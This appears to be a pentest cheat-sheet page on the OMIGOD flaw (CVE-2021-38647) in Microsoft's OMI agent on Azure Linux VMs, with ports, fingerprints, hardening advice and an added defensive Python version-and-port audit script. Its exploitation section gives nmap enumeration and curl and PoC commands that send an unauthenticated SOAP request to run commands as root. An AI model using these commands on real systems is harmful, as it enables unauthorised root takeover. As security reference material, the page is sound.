OMI (OMIGOD)
aka omigod
Microsoft's Open Management Infrastructure agent, auto-installed on many Azure Linux VMs. CVE-2021-38647 (OMIGOD) lets an unauthenticated request with no auth header run commands as root.
Ports
| Port | Proto | Notes |
|---|---|---|
| 5986 | tcp | OMI HTTPS (WSMan) |
| 5985 | tcp | OMI HTTP |
| 1270 | tcp | OMI (legacy) |
Fingerprint
- WSMan/SOAP endpoint on a Linux host (not Windows WinRM)
- Server identifies as OMI
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2021-38647 | OMIGOD — unauthenticated RCE as root via missing auth header |
Exploitation primitives
- Send a WSMan ExecuteShellCommand SOAP request with NO Authorization header
- OMI treats the empty auth as the root client → command runs as root
- Common on Azure VMs with OMS/Log Analytics, Desired State Config, etc.
Overview
OMI is a Linux management agent (think WinRM for Linux) silently bundled with several Azure VM extensions. OMIGOD is the flaw where omitting the auth header makes OMI run your command as root.
Enumeration
Spot the OMI/WSMan endpoint on a Linux host:
nmap -p1270,5985,5986 -sV <TARGET>
RCE (CVE-2021-38647)
Send the SOAP command with an empty Authorization header — root execution:
curl -k --header "Content-Type: application/soap+xml;charset=UTF-8" https://<TARGET>:5986/wsman -d @omigod.xml
PoC helper:
python3 omigod.py -t <TARGET> -c "id"
Hardening
Patch OMI to ≥ 1.6.8.1, and firewall the OMI ports (1270/5985/5986) — they should never be internet-facing.
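An added audit helper (not from the original page) for the two hardening points above: it compares the installed OMI version against 1.6.8.1 and lists OMI ports bound to a non-loopback address. It assumes OMI is installed as the `omi` Debian package (read via `dpkg -s omi`) and that listeners come from `ss -ltn`; the sample outputs below are constructed.

```python
import re

# First OMI release that fixes CVE-2021-38647 (the version the hardening note cites).
OMI_FIXED_VERSION = (1, 6, 8, 1)
OMI_PORTS = {1270, 5985, 5986}   # OMI legacy / HTTP / HTTPS listeners

def parse_version(text):
    """'1.6.8.1' or Debian-style '1.6.8-1' -> (1, 6, 8, 1).
    Assumption: the package release number is the 4th OMI version field."""
    return tuple(int(p) for p in re.split(r"[.\-]", text.strip()) if p.isdigit())

def omi_is_vulnerable(version_text):
    """True when the installed OMI predates the OMIGOD fix."""
    return parse_version(version_text) < OMI_FIXED_VERSION

def version_from_dpkg_status(dpkg_output):
    """Pull the Version: field out of `dpkg -s omi` output (None if absent)."""
    match = re.search(r"^Version:\s*(\S+)", dpkg_output, re.MULTILINE)
    return match.group(1) if match else None

def exposed_omi_ports(ss_output):
    """OMI ports bound to a non-loopback address, parsed from `ss -ltn` output."""
    exposed = set()
    for line in ss_output.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, port = fields[3].rsplit(":", 1)       # handles "[::]:1270" too
        if not port.isdigit() or int(port) not in OMI_PORTS:
            continue
        if addr in ("127.0.0.1", "[::1]") or addr.startswith("127."):
            continue                                 # loopback only: not reachable
        exposed.add(int(port))
    return sorted(exposed)

# Constructed sample outputs, not captured from a real host.
SAMPLE_DPKG = "Package: omi\nStatus: install ok installed\nVersion: 1.6.4-1\n"
SAMPLE_SS = (
    "State  Recv-Q Send-Q Local Address:Port Peer Address:Port\n"
    "LISTEN 0      128    0.0.0.0:5986       0.0.0.0:*\n"
    "LISTEN 0      128    127.0.0.1:5985     0.0.0.0:*\n"
    "LISTEN 0      128    [::]:1270          [::]:*\n"
    "LISTEN 0      128    0.0.0.0:22         0.0.0.0:*\n"
)

if __name__ == "__main__":
    ver = version_from_dpkg_status(SAMPLE_DPKG)
    print("omi", ver, "vulnerable:", omi_is_vulnerable(ver))
    print("exposed OMI ports:", exposed_omi_ports(SAMPLE_SS))   # [1270, 5986]
```

A version string with fewer than four fields (e.g. "1.6.8") compares below the fix and is flagged as vulnerable, which is the conservative reading.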